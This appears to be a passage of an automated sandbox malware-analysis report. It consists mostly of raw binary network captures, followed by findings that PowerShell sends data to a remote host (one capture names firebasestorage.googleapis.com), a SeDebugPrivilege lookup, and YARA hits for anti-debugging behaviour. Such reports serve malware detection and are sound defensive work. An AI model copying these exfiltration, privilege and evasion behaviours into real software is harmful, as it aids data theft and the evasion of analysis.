áÍ1©ä&ðDêD'^Lãê9[h£¥cëBÚ+ºãB¤ZÍ«ÆN(.îÇËµ;¨?öÈêÛ¸ê6 ÒWÆ»
Data received	d¼¿(s`ãÿ±àû¬Æ¤ÄPA7ó¡?âØÆuaXoO}Q" ¹ÿ88Ö[G^s&óBn§t 3±WÔòÕkÊw¤_2°ïr¥Ùö]9;.à· úv¶ÿæÀ¹Àí¼VÔøèXTCßÉé56âÅVLx_c{Æºéz¶½:>=ôn>Þ?5öH¬<Ü±fåê67ßØ5(àX}QIñJ4ÑeRUn<äQÆV1 Ô³ÒÆå-©T+ÚJ{V"?Ô;ÎÉì¾ÈÛï¦;=ña@Ä[v9àE[ ÏPÄ6ñÃ§éæùH-´Á.9#Êx ìOeÛÞwèÈîññ¥þºkÕsË8U×òG5lzàJ¸få×Ô6xDäíÎCo;ÃãÊ£õÊ\|%Åò/«½]ÞòèrXµAññ36ZÄQª5÷BÍLRH¹u¿ÖþÞyy;`v_Ìmþ¯½ÁLM÷f¬æ·xTw´g¸~UÖPHIêP¬A«càÉ)¬bÅÅ+qÌótW\([ÓñÛiYJt¹7ª«@jRq6 ÊyAÓ_Í0ÒR,£Âlm £´òGÑ¡Îú9s?k³`~3DøU Ö6mÄ0»çþ©ë?¼çfÜaøÆ'?h~fé£®guû$!ãÍù6kìÉÛ>µ¢ &Ð@'{]´-N öZEûÏ eñ;¶¬[î\|5·«ßëI+ö¢'±äåPúÇ¶sCBNRãWÃÅ^ò ß¼.1-k¹®IYÉÂÕ¶ªaÁVG¼Ëe;øKé¿ ç®X-´¾ÁÌë-ô`3w\|´yÏéàd¼x¢BÍíl!+v!r)ãÆ«òÙõA¼j0ÇÁp}GÉÊ?°²²Ðx:øÒ¢õ&»ÔJÃW¿ysËr FèÈIÑpD¦oÅ;¿h·§÷%ÅMrþ¬³ &eKJ`Ì<4(¤¦æ¿¢!£6ãÅoLÉÛû+,nª£ÌöÌÿù-)ÛM´Ðzßì°Ål?NÔÑú3÷!Õã#UÅb¨RsûÔÑïOÃ×R_¢9'ázÃcæ4¨}k¬r+öbQäi«¼f(sÇX÷QÛÒÀ'Â« êBÜû>ë[ú8½d÷tj[×ðä7l`õNOgåf.âaï5qs©¿0CÜ¥ D§Ë]K·[nûK7Dò÷% bQÃ¦IÊ#÷ËÐi½ÒuÑ_w(G*;_úÌ2SÇ'Ïa27À¯ñ¹Ëo±±mê[x¥]®,ë¾\|gëÃTá¶é½amÇÔfK¾Êú³>åÄCö`kC/àÎGe»v:ÕQ°ÉâÖ(i%8à/ÍP Fÿ;üiOùñ¬té8W¤Ú5¸°>ÛT¥ùî²\ oZ;ßg¯lÎLacT2h©GývÀU:LF³¶ 8{õthjl×¼w+ª4\|\âI{ÈÈT$ÜPzGnj&L0-ÛM²'H@FUmö°{Sñ¥FHà·NÛ¥]mÂ£ú{2ñ bÄ5tïFõÒÖP")º0{xôa¸ºÊF×à£a¾¨Û°ÁBªÀø-\ô(±>aÝ=Ùï
Data received	D¸ó¶4bQ]'>2<ÉOÂº~8ãLû§tq@a½øÞòÿE³¦´äüü `yÅ]ø
Data received	0îç7Û±TÑ0O°¢5m¶y[Vö.å$ç[ðï COSRüj éö{¼F\RÛqXìU¢í%iåèÑ,ÌÃ¬ÆXÿ]¡ô¡lè./5®;pà}tR84ÿ ßDq#o»)FÀÙ»cÕäãZÜÇÈ4í:DðòE#æ «5xFuñìR{UÔúðòÂïö$yd\|þ÷ú¾!ìN`W¯ycþw\³ÒNÝÈÏ²mY®¹ñðúÚÌ8êN¤Þù÷GÒ-ÂCµ29ÓÈæX¨ly&{&v±'ÄVQ!l$®J#» ÄgN§dÑ92âåæÁD^$¬6D5D$mp-¬ %`7òtöÓÄGø©:Þ}ÃñÍ{9G>ZÿÕæbú¾88S\|ÏNdñ6pÀ{ËwöèÐ[ÚxÏ <:É>/¯É¦°nfÝ®$§cFz Ü)aqït»¯ÚmMÒ1%<¨þü' ]©dñ\|8ÚÏ ¬\|d7$Ö^¢,c¿ÝíÆPµfÉâqzÊVþHA»¯öfN9éÐüÖå´oáZHµ,Ý«%3üPåòôÐ_3sM?~V`FÇóT9RuJ@«©<ÓG&UNcxÄoÃó3sH7bw_°°:6"ÑVÁÊ´©b=yLqG@Kö !¡¼ë@Ý n[4øàWÜ 2ûL¥`¢±ä>Ï9ò¤¶};jÊRa(M Â"·zÍ4Ð³®Oð`0ó>(Ä]ëW³^C· ç\|42,¹$/É!dwüï®]À¨ü"¯&4ïçÂÄc¬>¹¥ì5¨a{D`¼@òÊ~ÒcHþWÚR³>ÎüÎ×=º§)½XÚ(jÏa12¯jÒGs%;Ð¢r=ÍQ®d¼Ô4°ü2äyæªùÒöé ¼û·ÒÇyíæýÉÊo/Á³/ÿøÇ±óçÔ)b£è\|"@¥»e¡ÂMyJ¶¶ä~h°úØK¬ï:Ç[`AÏnÎ²?}Q¾ÁGú.ìônmP×ºÔÆÞ I BÚ§fp£µâÎ¨N`>MÙB6¾ZÉUã´§ò¹Û´7L0´èÂ{b±gÚX$PN³9>Å¸åìräò@ÝY-æ öú¼ÕN³×9Ñá[¯.í( lÙü§£Ó ÈôQL?rë¶)¾¹n_èxK¤¹f2ÙÛ.zLÇ_iÌOÿóWÞái«,Ur{±ÿ¿ÍJ5·Ú¬ê6^$vÊ}MÉ5íyjAs®¶§óä d?¤¾ÕÕ´; n§TóFâ;Ø0ÇúH{ SN{8î{"0îE¾8ê7åV8aù[vMV¥C Çx¸Ð$Þ;ã#¨ÅÁÂFîr×¾m1ë+ fQ®HG~$²åµcEIÀh-Rszø·ÖÐRÞgjg*'rT£ò´o÷«ù«ÆÜÞ`LH5fzcW¹Z6f7çÅ¾òáfv÷xþ¾V4~>µµÆ<«ËÕeX¾¶f'WG¹ËYðõtä²ã¯k¼2ÓÀ75¾
Data received	ë¡á "0]ÐÌ§îxÅS(zÓÞC©ýò·xPÂg7PNò°±âÑ¨v2O¾ÉíÛQ¬§N)íê«++³ñê°©'¸n$¤ ÛïûìÎ;6¿i¨Áq;KI²·%²fÎð»áoÔÀ]íðÚ¿ëï§z"k'¶öÄÉûDû4pnPW2Cí·Æ-®Ë¢;×6Üeå(dzîþïY^WIzò#9ö2ªyÅÂôÝ¯lZB\?D¥NkºêäeÀl}Ks>SL2Æ >uÕ°®¿&ÒQÁò´FíÂ«(<¿zI³Ô1ÁÏ¶èòD£:YJK6xbÆHTÜf!Pï¶]Ã:y£×ÇZ w×®-.ú¹É]à»ö±Â©ÎVEZ}Ü@§&Y=¤ÐìJ²ÓZ!{¬Ìrûémó/Õâôtucõ0],I0bð^MQÊÅ§F¥ZM-¬[X"´/WÌvZ¬ªq~,]_¥ZßeçyØ¶ëÙ²vê½{ÊÊ²`û%tl~[+Ö^ñ·]9n&.îï;DQ¤o+@÷ÙòTÙí_@W>>hK@W F¤ÏkÆ#0CÙÈ,ÎGÁTx>}¥)<{aÂ7VÀÁþsñÎ'LÈ\8Vû=þâJ;9%ÇAÚÅ^}/!»Ð/vöé]r7N^aß«»VBü3m±è lÝÉõ²Dÿmng\|»PãL)-ÝÉ7 ßïÂÚÅ°:(}¶Z°Ùl¬ì!Ý±UÆ£×± Y^@Ø $ÙU6sWxz~~EÖç/3ß<@BôÍùqÆHÎ>¦%ç+UQï9y¶(ºRÌ+\|cÃ'ËÍn1¤ËµKIí®Zª3ØP;ãDGHjÃe¬bE¹®Xêvh²Í'¹@~öa{ÜQ p@Dâ[-¹ß<ÄF7»®/OÚ[ÊdqZ#Ð\|kW`Òp¹13öe}9÷ÊiÊ·çQ²ÎóseÑFÊ¨.q(X«RØÉÈrwP;Ó{½Wñ±Û0 ¬L,Ü\½ Üia±}ýtNc½äí<À5õÜaíoNÝRYhÁ_Ñ@ÛS>>Q¨(éÚÝ¨TTëZÊ}±5sóÄWÝc«q?éuëÓz·ÅÏ)Ä:ÉÃKr¿:9ì=â÷ \|G#äè:Ä0"#>þI;ª ígè¡jYuÇ½h R+êàîEü\Ýúi¹CV}w¢fSçÍêé»¼B_X<-BDj9(["ká:Ü®ÐÖ$::QSJ©ho¥$WõtrBØËOQy¢ßFî¡ôÌzRÅÔ{±iª¬uÇó`u»Ay7Lñª,ÖÞ[¾95\Ã±j©nM«áDVuY¿oas¶¼~X=, sf¼Ä¼è:ÅÁ³ðjsæqÈí"]üéÅçÐËFî÷ãÜ¬ÎÌFãÝ¢f øû1-¥hÝÜ-ÛF2_SN-K¸gºÙ ÍüÎ:)E+à9iCS1/+{S^JÄiXy¢Úÿê¯Pq\ªãÇâíÉê5Ï5K¡W¤ýÒÝ@Ày®b»904>8(¶í%Máh£xÀß X?VÕrÃHÚåÆäèó(ÄÆB
Data received	D¡åVÖ[7bßóÄý\9óA,Í0Y}¼T¨ëOÁJ¨dwË¢ØTÕ¥¼"Ã¦Im¼¢ª9?Ýí:¡ì:ÈêÀq»¸Ô§¼o£A*ñLB
Data received	9L(w£Khîj{ã5Éª ÃÞ»°È^Ì?Öà§agéø<¨Üð+0 d÷¦Ó:×VÈ-SØ §SêtÖû¦¶câU$N¯k µAe0U¥Út`~ÖUgðâÍ êÌÛ?ªú'tÞ8±§fªòôñK[zóµþWïP1u)ò±½¯¦>â¿ EìO§bc4Z½Ä\|â<_Æ_ÐLÇµæøj½ÓÛ§$§òÿ\B4IT ´eqäØ9ñÛÔZN\|`Îô} G!¶`ïê/ßC°h3<ÏbA¢ßÎs"³))n× 3Ë]ÛK\$=àõ3Fv-.¥uÅbÁ3B}âÛ/Öºêzkdsi¿ã[0IË7@¯Ý\|J&TÑìVÜ9tõn[^Êñæ¡ámF¡'¨A@E(Kû,â½?Æ2´Yù)Ì¸$Ã×HVD¥±<[!ÀZÚrÁt-Ì \DÀèb±ó!ì¢äCVßÁsEÇé)Q¶Ö0ä×ÐÃL ³K¼enNý£¤Q=Ãd'ÒÝôTÎô ÜJ'¨0!C¨5U$LEiVüK7ÏBö!Xl/RÛÉÎØè1ÜÖÆOØn2ËeÍúÉ68½3ô]Í" P¦1 .1ÝÙÔü-N]¢Pº´:·2Ó(Kå¯u%½´rNl¼Ì®qªiÏ×#8%U3¶°ÎDfeÔ_+VRìáýÏ_jä~~{2jî/9ÞàÊÙª¡mÔÊÂm 7ÚI A±ÓÊ7D-#Pöù<´î eøD!ÐAÀr³Á Öègçª/¢·ÍÜ<\ÎÈ=ØÔýÞbµ²®wÐ²ùfó"[¤Ó·ÐM ¡/öèÖ§SÓ£cñÜÕ²m¯]{9i¤àWæëW/JÂ=êr¯Éø¤Dmúì½¬ól¸¹tÁ3{p9åìÞß¿ch\|LôSSLÞð+uUpò)ëCïÕmèø[¿X>Ó40Vº¬èz'Ñs(¬Ò%?\|ütÊy²¬Üþ`¤Ô¨vjùzÃÇmX÷h'+ÈMp«uKümz¿ùh³íBá~O"²×nßQ¯VmI5wT$MþþÊÒsBk[Î{ü'ÒÒã¦0õs§ºé4 Qe{è ªyÄÁ:k$¸ÂXéB:ò*kÊÁ@Ò×ÍàXÃÔ¢£.ÄhG3`½5ú£ÁGU`b2¨mk±98rÊtÔ,P)ýiÖ^O~¥^hAáuÿ».5§¼à2kíN½m\|Lëil¬Ó(ÎÎ¢ <s¶!¶oèz=BY')ÇoáD\: ÛqÔÐtâYë7uÞòÜEÞk÷)å\|Càå(¿1¼KKÜw2ik;\q:ºÜ³Xmrôõc®©2¦pB1;E°s¯`tc¼#ê®¶Ü[ks¯\|&@ Àêïe»ÿ2za®þÔÛ?!6A¹eVbrÏ¸Þè+¡ã±vÐ¸PF²¸ñzkW5Z)qR°[MzÐLÐ°¥3_.
Data received	F2ù¦ç\f»Â-á¦ý\×Ñ¶°«cêþ-a®ªØ·ùhÞUYøeGT,BiÂ©x©²øqI¿Üéza77Cò)ÌÓ ò<©»#ýÀt_U 8Ï#EAQ/BÑyÒZlj1;¼\|åTN¸÷qfïÇJØwbm]:ú"M;¦éÂÇõcÒw¹Õ4Ã×ÙàÏ(¸FÌuNêÓû]ü¬!L4>æ#ãQ1Xèô,Ú]iÄp8z¤ ðõÌv« »ûä¨T´³û=:ÉøÇÓl¡§19ccjm¾,ëMÖÛæ>ÐJÜI{wW¼>C~KC£6ú°Sþ;þ@ÎqM(\ò?ØoËzW÷kéxÍHì¼¼ÏObþHì¨Ößj¤Î1¦þÐôQ«¹'®3R¡²QªÀÒ°Æ« )ò Gô1]læAæT}Ã¿xÐ¤38=\|@£Ð(µé Ó qÓÁûðÔtBe»ß4$"W>"ù& û½ËÏ³´9íW²mÔÐí$» jó-:D}$j0_ú,W/<R¢uÐòÖK¬SÓÏxå´ÄI LÞ{&ØWÅFëôÌDØM{{ÖÀaô¢UDÛ/<~ØáAÀuÅþÇ_jMÔ÷¶¢Ã3 }õol@¸ë~PÏë} óå(Ë E3c§³Q4Út8ÎoT.ùd X<'äFoÍôb#}$ÀãWÜQXE¹²ôÀ.(Åþ¥KÄ{GÏ>J-=:Vô>=í>l/Î£´÷I¨C!+èäê9z.³Ò]ïùBFâðfIÒ&å¼J8úõá ª¨P$Cû eÓr¢åÖ6ñÄËâ\MhC¶¤ê^Xá>/+öM }õÒklôºL»Û _¨¿àwDïzeð@þ¿É âë37cùtdØuòì:ÚÈ,Á2£ë~ÃÈYÝU¸·O$¤ /¡ +0 @ôàã³Ï}rÁdÔÄéÌ¯1«Òé.ÿÑ( :ÖQ/:\SJ.nAú55½õvuì§)¼k VÐùô¤¤nî2êEú4Q·Éè"=ëÇI<ºÞÑ2w,Þ»4Îk&mLàO`ÎY .¬ýqL%õçî^BÓ§#ü þæ}Î0,£2©_õ .e<ü4¡0j,j3^³\&à6ØdÄì¸å³L®ÎA<uó³Âc4Á!rLÑTñÆ´×F±úü}3¡#åµsB¥»èèW©ý¦^ì¾¨ ãS»ïª ¾>nj¦ð¬Ëb9ò&¯N±%6«ÏÕHÞ&óÕåûíõrèöGçróßG¥%\|:µ¡zãè÷ÔÍ{c¨'}@j3µÆZpÅÚûâ«:%Bl®uf(ô¥AEê¼»÷¸â~M^R®:grýoë?M\ îÌ>^¡L/ &¢Ûô³ô+T¬ù`ön»QñÝCih 0WÌñxÃÄ¾o+9ãNÅÎÆ2ïÒ]á.}ÁUÇ«Z®Ãcx8 ¹f¨Kµ+ÝFZñ'ÃéÐhúÑc®-lÃwã;xg Ë¨ºãÔE}¦Pà@
Data received	0
Data received	~WK¡GGÈ»¦±UJàTM}$iS´Y÷Ù¨1ËÜ£ë±}IâÍya*·Gá§É¾Æ-qyxÊ´Ê~½Â¤/sÜîeÃ1hr659«ÇyGÃ!è^èòQ¸þ¡ÔÛ]#ÜäV
Data received	þ¬þÛ«:xTòoë`bô.½oÚÛK¬uÎVOÎ£R¶ümð =§§¥èÁ`ìÃãÑ·^¥á¡G.G L.3 QÛ¢%=É¡päöªàÈO åô#ê^ú ·MÉ¾{ñýøçY³=ûVb Ð1Kì¿Çù[6Ô¤Kõ<R®¸#åJ¦nKçð?óÞü[2ö?Ø'ÂÀ~Äî÷Ðr¨'@Báåo_Á ¬zé£°ïa!êCD(DPôqê¿\|+Ò]ÈbºÙ]ÃÆ2,¸]½Ã Ãú¹dN[Ýs¨D_-N]Y¡%ÐlÙål ¸¼×ûò?~¯ Z+XvPZík7[Zµ×õªNkðNµàd×!C=qè{ª]Ìû`}éØ òNý¸±ù¦,¾ë vÍ°d±¹ßè]vI ý'Ô!Â@\òÝuvÑ·zÀ9d\|¬îfSp¦Ú2:9«ê¯8kÂ¨É^Ùm>Åï$3ëènciæ¿-¦@ÈE.4·ÞÄ-,ë1é¥Í<U«ik¹·j±ê·óýÂ¸årsê³ëý½lj;Ó²+MÃó´Ô²)¨e;zs!CÜe¾ó¾á¤¯E_»ãÍ/,ê1{VëæXüò¹\|£KÈ[¿% Dd,èÃïØõ®+èï,vÏ×bì Â,-RÝ?ÇS÷uÔt=ÏíÓª¶á BÎi¿7ÙàðÎ¶ÈÃÛRx(e~(êá²ÈÞ±3®îP»Ì/×æàaÇÙq$ßÕñµèËb½GHVåõÁuWí³ølòê·iÅ4x¦è,Ê! º$ÄXÞ-×ågô¸ãÝU5ßÍÎÄ`³Îß)ZÙAWMe<÷<SÒ®»ªg_bZg¿ÿÂ¸=cøCcÕÖ oõ¨MBìTû@»fq\7¶º DÀøæåFdã 4Fåj¯~¹ÃÕ@å#±á¡¾iÉ<¹)f!clæ¯È¸èbîzH)/ÔÍP £RÈcãÁ÷¥óHtiÿåÆ¿0¼_Á¸¥@ç>ÑIkFóU6n´boXþÛ#r¬CíîÊ'oÏºn=±®6.cJhg¨ §¬EIåÅ.sæáÀæTb^È».9¢º¦;~7%ÿÈùÊ¯õ¿Ù }ÀÒ ¢ù,yUÃ¸ûfìÜç¤Q®úZÜ«ßÖÔZfÚ¯êyà&ú_Íg¶épUÎÁ ?:M!ã§éÒ?¹rà[´1iv0I®M% þB*^§à¬ºÔùûÄ7{õj< ZÑÌÒ¾àÎèçXÌ÷Ùó( ;¸Ï>-ªóù.k¶±i¥ï>Q¾7uaeä À×² ãf]ÃFÑdj©³årÀðýMjépAnIè5#ëÈÔ
Data received	lL âÜP¥:A2×gïºA~8ßóÉ¿È:Þ$î¾è¼¨êzÌ= ÏIÞJn0Ic}Gm®ïx9Ã¡UÜÛ[g7Õ·hñêörØËd§5Dx®âs®Õ¿\-8kËY;ouG]ì®ÍìËª¥]ñëÙë&p¬lh&¶/°Ôt×øÞ^µÿQ ÝuY2~À±1xlÿ!×ÿP{=Ä¾ð8J8FTIHmæÍ8£YÚé5AÈvÄ¯¶fàÆsGÛÍÉUÌ¾Ñ¶;;áÊµUyjGÿÙkå[¯÷öögGd¿JóN¼kcÿ²¡Üõ.ÁV¤¶IÂ\|º.« 2D÷ÅtºùP+hûqQ°PVçõ¿y?c¡t¢()65ÆÑ£vËDhóàÙ>d©Òw¢õ©3.²í:!Ë^ gÆräOÚÌá>.µâ²EòäÅ´@qÏ´? «ñbä³ûwmÞÀxJp:'l ¢=#ÃÕó"ó¥'uèÍdÍNït¹àw OmjÕlËâ>á9Åòëÿ¼I¸tø²%§õÃ4ÕZ¢îáåÞÙÕÉÏaÒ\|ÇñÖËÈ`/s¶:ïùnïÃíÖ=mªhHÊëC!z{®)ÒÚµ7'YZËÁ¿óuz>ºKåv¦KÀÓÈMá¬ÿåx4RPDíVÅã~à+#¸ û!H ¥xðÏ2Fãà[Tvøürý\|aÏOañ69`àà¹ûûåL²P¸ç$×-\¨·5²¹yëÕºN6v2Üxpìhè3'Évùg\|FÐrãyÎ¼óï'ìtû¹QæÍÝÅrÇ¯Y%:ÜfíH7ERÊUI¡&õvTSnüÞÛÿ(_3GõùÈJ£®P ú!~}ô¿^pCîZÁ×N´«¡©öÖ(:G4p{X(Û\kc^È/ºÅã¦¡3rsÆÑÜFÖ¢à½DbD[: ßRd.÷Ï£ÍLyòdb7*{fî÷£1¼^ÍJE¹ñ±8_v<v£bÆM=üÀ³ÃVëOÎ}àPØÔÐS©)?õäñ¦f½ÿñYòbGo£ÊUõäOær ñxá.(Yæ`2Ø,>ÔQRÉ$ÞúÙÉ]Ñ#JAJÚÏg8-«Fá#©GkáªIÂöË_ÌòÕú,¡O¡á·Vðµ÷ï?Åzí§aü&â"Æ\|smÙß3ù¼½J úßdØ«JZæ£áx¸êxÚU(àIfÓi&UMñð7Úõ²\ <0öÃëüM3iðL) / °]±~z@ÙÍUèËæDU¤=³áÎ'åÞuN´êáÉvþmû@P_r¹Z¤uWvÕV:Ü¶!ÇxxWÒWW,8]è¶±'mN´&ü¡ÛFMÜCX7`e:ËØÍRh·´Ú&jÈÙÛÙÍSM Ü90.ã¡N¡ùGjHUÏ8ª¤ N>\| TÑà½ê§]ÂÓÚlFÞÅ¬/î3=â:bídc )Èæ9?þ¼]ð§^x¸,uxl´g«ý_ì/3)íÙÐõïL pÿKp-CR¤}uéÛxÚr¦øã¢4®ldÜåHË\TÔÇUmcl»
Data received	Ñ¹aØ1C§Î'P¢³üöøæoá««çbS7ù »CDMôÁ%Ohn«PdÛQA¾sÈ&4ÄwBÎ4ùPÃZ4ðYAØÇW¬ÎBËÈ, ÍÅë¥/&ê=ÆÄNþÎ¦*¤2Ôw¾+¦µÉêIð¤ÈÒéy«8};Ykg_C·ºc$o¿}Ìxè0ì Ù^á®ÑÔv,@iÕK`èmR0Ûê°.òË¯+]á_Qíxezl«Ú
Data received	¤>ñMej·Bîõ¯4ZÙ½+t]ÿþáê§Óuàæÿ×:Q!u&¤G}X?\|¸J uö>x=>Xl UYFOÓY¶&üfÎöÙ@Ypê½@?½ÐøcÄjBõÞØE¹Ø¬¤×.8ÕBB.²Ô\Ô}N$]»>¿ºdªà×te×¡÷ST1â>ÿõvîßYì!wÇºHB¢ÆÝ'Uª1m{51naôÑ:±ÊO@Î?®ß^lÂÝùR/-¯¡ ¯Ú-\|âïÉN÷k&wÀÄ¨û¤¹T¹XjlJéK\|[45Èþ8û±×ò&-@¿Û Ô1Ë¸¤^ ä´iU·éã?Z40ñî\|ïÓá¶^HÖ³isF¾Ù^§ç²C+^éó0âð¡Åéwm.Îiy`-¢[\Ò2r/42úKûîO:!Î½ÅA>2ÀGYÈÆ×6J£óãýb¹0cÔÇÿsµæ¬ÍÁ£`úðº$PÜ6ÉùkâýE§ÛvãVýÒ ôAPlî¥yªf3Ù6ËÕî"BUµ(^ì4ßë+ï-Æü2ô'Ä3o¹XÍ0¨ûÇfT¥dalýV?A¨#Í5äTPTqó«<Ú"ìbÌ:d1¥ °!ÅËïâ0ø d6énA¿þø >#-IB;I]vxûèõ[IÓõð©Sá`Òue<OXmAB£µzàJ->z<ßò;-=P}t¾ºBä/&êÅÚ#SØli AôaELþç¾Dké<³»ªvQóóåØ¸îeº2ßYQ!3/Í GØ§´£'m£ùöYäÁ 6¥Å]ÀëýMz}J1^ãÈýñyø×Iªg´ª.ç3&#RÏÎý«´SRü®bÚÐãÓß äËHÛÿà¤à½Þº,Ý¦ÛðÀÃxºýí_ªg>CoÐÏ÷/¯cºWö-©Téi 1ÊQÓ»K§³óæQd7XQ ±wÊ"öõzgIËÉ]lR"?sª}Þ,£1AÚâTQ:6°«ÜýèÒ¬Ê&õOèÞ+øÇ¸ýÂ\É- à^xH-+QuµÐlS¶G-Y,Íý+Ç2-lâATÛT}W%=sì$ÊØðøì÷á=ûc+ÁM)yjlÂ&¼îGIh6_f:£ÙxÄûh¾§µ×låñÞî«O¸7'Ç<¡,]~ÂYMÉÒ`Ñ}þ,¯ Ãv²Mêþ&[rPp{oR;Ó4è÷ÏK+¯úðÜ¥MÛÅÑ³Ð4´O/"èÈ8Õ=#µáÀCÀî}q~/Aã<¶@Ø=ilÒÒÉÌüZÈÆTT[ÌF+ïüï¯
Data received	ìÀ?;sá÷®ú}¾+§Kê³< o¥a"?\úüÆ&µêPçÒ¾· ñ u-rxF2K¡IeÙH[?!QÐ¿gëO½Ó#LÄ/1Ìk\|p»1ðÌ¢9ySþêWJägù¼¢-¯gÖufúñ£;>¡7xñ} zágðÔðEB\|úA?¤ \|$ÇGÔJÙ÷uhzñ#ÉÛKàNüïìû°]j@@ÀY{q9F¼]\<ußè2²F"¨[ÔÜèB~Ë%F´o®´`AR7Õüe)K¾à®çë?³Áx4/á¶M«æ· IÉâ«ïÆñ Øtó¢K$4ÍS,I±ÔQÍkÃ#©'÷póv!JsÓ ÷û Ç$¸RzTÑZgZÍGìíH½9¨ü¥¹Ìºo'8Ò¤«w·AóGÉ+KÊ@ï¤BëO.Ó7ANp~xDãn,BÄÿJùy×-«ÊÀ»º]¼Î+Y»@é/Ç)<Ñ\|ETßÔikäptÇÂ@ZR6kª[^ ßsÛÄO8Ödæ%4Ñ\|r7Ó/ «Î¹ª\|õhÜ\|j,àeÜEªÚó&8¶¦5ìKÆnp¾åÊê'Èè(&o¼Ë ÄÑì Ý PÐ`ð¯P¹ðAÕ\|£ &ëGþ^µ=ÞF\|ÜþõÜp³Ïôm.Q7ÑS)»Ã'Õ·¨æ©ôàØ+nÛ,LêïÇ¿Òà^lu®,ëÕ7#7RÁÂ'^öóãÏQÎ(Á2ê_S0wÍxÝUjï ¦.L´+âI,'îY&{Õ [é^Îà[ p(<ü BV.`£[N¼z';âC°h¤ÈÝFºéSúâö,ÈHZö\|~ç_F¦_dr[ì[ÝÂnÖ%NË0¿ÁÛQÈSR^Úd/\|¦n'mÆ÷´êÇô4T"=¬'õ!ðÃêÑhZ:æÞú~&t-Þ<¶ _}£0ùûvä²WQl «Q_$@÷ñh§p¶ËÜDÔÇxÍ ;Ó¬e Eézä£2ñ'Ó \òBpu£w={¨¯=OI¡cÿÛ=0^Õ½öØç¡'ó#ÚIz6ô ¹héÊ-Mvp;,#÷OÏf[K%Ê£íÅ¥NíùX®G´Åâ2ÑÑá¥©ù ÎÈ"Rãê¥þ$÷ÕXOêÂ¯5pS½NXÔef÷:^tsÞ_=o6·$+aS4 }÷ìÕ¨/-?s¨&Âþ<ab=ñß²ø2áWÈ5HðqÄW±r=à\|j¤ r<G@£ÒìÑyìûøË8và/ËÿîÔ£í»doy.Ö$Þ'eù»{¹UüØqâî2Ö¶R}Ucâ1²_Dv+Oð-ÖFÙÓ fFómb`a¶59¬ý"UÝ ¹ËF Æ+¥`ÑOÁ*ZStIYÎÝÏ¡©;AÜâ¾Góä1ßÛãª ÂâÀPíÇÒumíÜÒãnÎÈ9 ¼jþÇÆí°iý$Q¢ yíè}s7«àP¹imÆ¯oã`ðn(Ü©}CkE¹/RÆK@ÃîÀ9×è¾¯Uwç\|ël çÌ$¾WQæµ"ðàx¶M§M¡9ØØJ
Data received	ÁÌ)§¿r-â¥'ÄÍ(½S¤Ð o_¤ûùlxMªûkª×sßËõð×® Ä3,¤f\ägms©²%Ö<ãYIñÞ}HD-hÊAQ îá±*bH¾`¢9!ê8 Ýëy4zPW¡hnk=R«ë#¥%zÕMXÎ³eûîS: Ã×&ìr7`PCêå@¢·ô9½©ÞÆ; ÀYÝ jè[=0Ì¨ºðÂXq¿èÄ¯l#¦"6F 2§p`NÄN"msÌ÷H
Data received	J½¶Kj¢ÚÛG}Ë)Ö @Ü)Ç¶\ÛßRÚv:m6AKIºÏÇõ{ú=ZÇ%D§1}éÐ}$ÕYs¶æøJd]°§àYKË¤ZéµJUZ`£ºcq7¡®F_&EDB9'Ôxm)àÛ¶E7>¬ås!@®aãð«ýêªN#ý%6µäxgÍõÔÇ¾º¿ñRÅ½±ý¾C7è¼Ñ}Û2\|ÿÊÁ`üUñhÄx>g¼3làAÇê½Ã²Ú p±èç=`µÛ+[Áîa -Dwìó-%uyO8ËKl±dt9åº@V$N< jø_·0Í6ùaAGÑ)Tp§"X%vv_ùQÙl\¶]¾]þÁGqù<ÓªRíÏWº%°JÉ~ß§~¼ÆO¢öÉó²Xô4yÅ ~?Uïà{#ºÎÉ6z 6ª(ÌÍÁdRc+âævÕ´kñîc·¹%DÁq]é4íÐÿ²ñÛÍòÝø_îQÄÐ?/ñ¾IÒ>ÙÞbàýÂ`éÆFÐl÷änM úxRÛ\| (øñÜëÛ2Jl/ºÆJHeMÏEýuOÉ).¸ê¦£{/¤ÂÚî:]LÂ7ÐÏ÷mFk]l÷¸$ídXÕLa4À:;2Y ¾Îð?C¾ÇÀýêsöäO,ÀR¸¥ñpºôÕ°óCÈºÌ¯ìß,KèfûÑ7£C·~d#å½<KÌyK¯&»økÇ ]²5ôÑ~6KD7YD¡aLÅô>JÐ³m¹qÔKºË5â4Ú ð+Å%»¸n.T)¸2VÞº!êååz¼UI2LËp¡ê+´ ÅøÙó ]ccêð «ÚFñãûðAUÏ ÖïÌ1§~/zråðákóÄÆ·yz>Ýë÷°-%§ÜôwÖ/¼bë@öãÒnI¼Øpå¢£ÔúELÍïhÈðÅûfõ¶SFl+R¤²0SpÓõ{àÔì@t¼õi»Ù¾GK/tRwz».¶s%,l$} ´ÑçµgGt(ÐÖl"n.{Ì÷g^¯%ñcé) »)GPk;4«>ÔIº.×Ç<$J¸¦ !ú?Lqâéf<ì÷ßZYäïoj%´mÁÍ(I¢iolÈ;]úýÄ{bìÂYO1ÌÄ$xgÏð;ÔÃ¾,ò2±'/÷g±ì VÔÇ±øNëo$jîu·ÐÙóSÌ²Äç\|ýËÇ§Eî)'3FY©î¦9%s¥ûBCH.Ium±$ÿlªÞÛ´Æbjë3I30puÙÆ½ûôÃorãÉÓßßû#&yN

Poweshell is sending data to a remote host (3 events)

Data sent	}dvhò#^MðÜ/x8zå%ñd£QVKé¢¦\</5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com
Data sent	FBAv¤¦¬5&ggªðe;NÅ¹uînh¼Ü_ HF¤MaIXÆÞÖD@ð§¨(¶Z%cm%ZùÇ¤ïï}40³6ªV-¯¢gh}ù~bàUÁGH51ôîþÄÉè3-EÿÀg¥÷;zÞ
Data sent	À[ÕFyßPþÄ¹â&OWm.h4¿rá& EsÎP!\|Y&)o©\|=ÙÆt*:âÏ®7g?ÏS4pt¹Z&Lº{Z³q?W°ÙmççndQ~jd+`_µ9göCü}ö4=ÊþZâEjØØ9ìý$¡8ãMïµ¥OrM»pQ¾AøøÆ¶~O¬è:F@xÉe¿@¢FhNw4 ¡L¥

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 18, 2023, 12:13 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (26 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
